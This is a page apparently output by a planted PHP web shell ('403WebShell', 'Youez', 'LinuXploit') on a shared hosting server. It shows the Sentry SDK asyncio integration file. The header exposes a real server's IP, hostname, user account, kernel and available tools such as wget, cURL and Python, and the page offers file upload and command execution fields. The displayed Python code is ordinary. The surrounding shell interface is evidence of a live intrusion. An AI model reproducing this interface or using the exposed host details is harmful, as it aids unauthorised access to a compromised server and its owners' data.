Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 18.224.38.165
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/sentry_sdk/integrations/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/sentry_sdk/integrations//asyncio.py
from __future__ import absolute_import
import sys

from sentry_sdk._compat import reraise
from sentry_sdk.consts import OP
from sentry_sdk.hub import Hub
from sentry_sdk.integrations import Integration, DidNotEnable
from sentry_sdk._types import TYPE_CHECKING
from sentry_sdk.utils import event_from_exception

try:
    import asyncio
    from asyncio.tasks import Task
except ImportError:
    raise DidNotEnable("asyncio not available")


if TYPE_CHECKING:
    from typing import Any

    from sentry_sdk._types import ExcInfo


def get_name(coro):
    # type: (Any) -> str
    """Return a human-readable name for ``coro``.

    The first truthy value among ``coro.__qualname__`` and ``coro.__name__``
    is used; if neither attribute exists (or both are falsy), a fixed
    placeholder string is returned instead.
    """
    for attribute in ("__qualname__", "__name__"):
        candidate = getattr(coro, attribute, None)
        if candidate:
            return candidate

    return "coroutine without __name__"


def patch_asyncio():
    # type: () -> None
    """Install a Sentry-aware task factory on the currently running loop.

    Every coroutine scheduled through the patched factory is wrapped in
    another coroutine that, once it starts running, creates a new ``Hub``
    from ``Hub.current``, opens a span (``op=OP.FUNCTION``, described by
    ``get_name(coro)``) and awaits the original coroutine inside it.
    ``Exception`` subclasses raised by the coroutine are passed to
    ``_capture_exception`` and then re-raised.

    If a task factory was already set on the loop, it keeps being used to
    build the task (around the wrapping coroutine). Otherwise a plain
    ``asyncio.Task`` is created.

    When no event loop is running, nothing is patched and the function
    returns silently.
    """
    orig_task_factory = None
    try:
        loop = asyncio.get_running_loop()
        orig_task_factory = loop.get_task_factory()

        def _sentry_task_factory(loop, coro, **kwargs):
            # type: (Any, Any, **Any) -> Any
            # ``**kwargs`` is required: newer Python versions call the task
            # factory with extra keyword arguments (e.g. ``context=...`` from
            # ``loop.create_task(coro, context=ctx)``). Without accepting and
            # forwarding them, task creation fails with a ``TypeError``.

            async def _coro_creating_hub_and_span():
                # type: () -> Any
                hub = Hub(Hub.current)
                result = None

                with hub:
                    with hub.start_span(op=OP.FUNCTION, description=get_name(coro)):
                        try:
                            result = await coro
                        except Exception:
                            # Report the error, then propagate it unchanged.
                            reraise(*_capture_exception(hub))

                return result

            # Trying to use user set task factory (if there is one)
            if orig_task_factory:
                return orig_task_factory(
                    loop, _coro_creating_hub_and_span(), **kwargs
                )

            # The default task factory in `asyncio` does not have its own function
            # but is just a couple of lines in `asyncio.base_events.create_task()`
            # Those lines are copied here.

            # WARNING:
            # If the default behavior of the task creation in asyncio changes,
            # this will break!
            task = Task(_coro_creating_hub_and_span(), loop=loop, **kwargs)
            if task._source_traceback:  # type: ignore
                # Drop the frame of this factory from the recorded traceback.
                del task._source_traceback[-1]  # type: ignore

            return task

        loop.set_task_factory(_sentry_task_factory)
    except RuntimeError:
        # When there is no running loop, we have nothing to patch.
        pass


def _capture_exception(hub):
    # type: (Hub) -> ExcInfo
    """Report the exception currently being handled and return its exc_info.

    The ``sys.exc_info()`` triple is always returned so the caller can
    re-raise it. An event is only built and sent through ``hub`` when the
    ``AsyncioIntegration`` is enabled on that hub.
    """
    current_exc = sys.exc_info()

    if hub.get_integration(AsyncioIntegration) is None:
        # Integration not active on this hub: hand back the exception untouched.
        return current_exc

    # If an integration is there, a client has to be there.
    sentry_client = hub.client  # type: Any
    unhandled_mechanism = {"type": "asyncio", "handled": False}

    event, hint = event_from_exception(
        current_exc,
        client_options=sentry_client.options,
        mechanism=unhandled_mechanism,
    )
    hub.capture_event(event, hint=hint)

    return current_exc


class AsyncioIntegration(Integration):
    """Sentry integration that hooks into asyncio task creation."""

    # NOTE(review): presumably the key under which the SDK registers and
    # looks up this integration — confirm against the ``Integration`` base.
    identifier = "asyncio"

    @staticmethod
    def setup_once():
        # type: () -> None
        """Patch the running event loop's task factory via ``patch_asyncio``.

        ``patch_asyncio`` does nothing when no event loop is running at the
        time of the call.
        """
        patch_asyncio()

Youez - 2016 - github.com/yon3zu
LinuXploit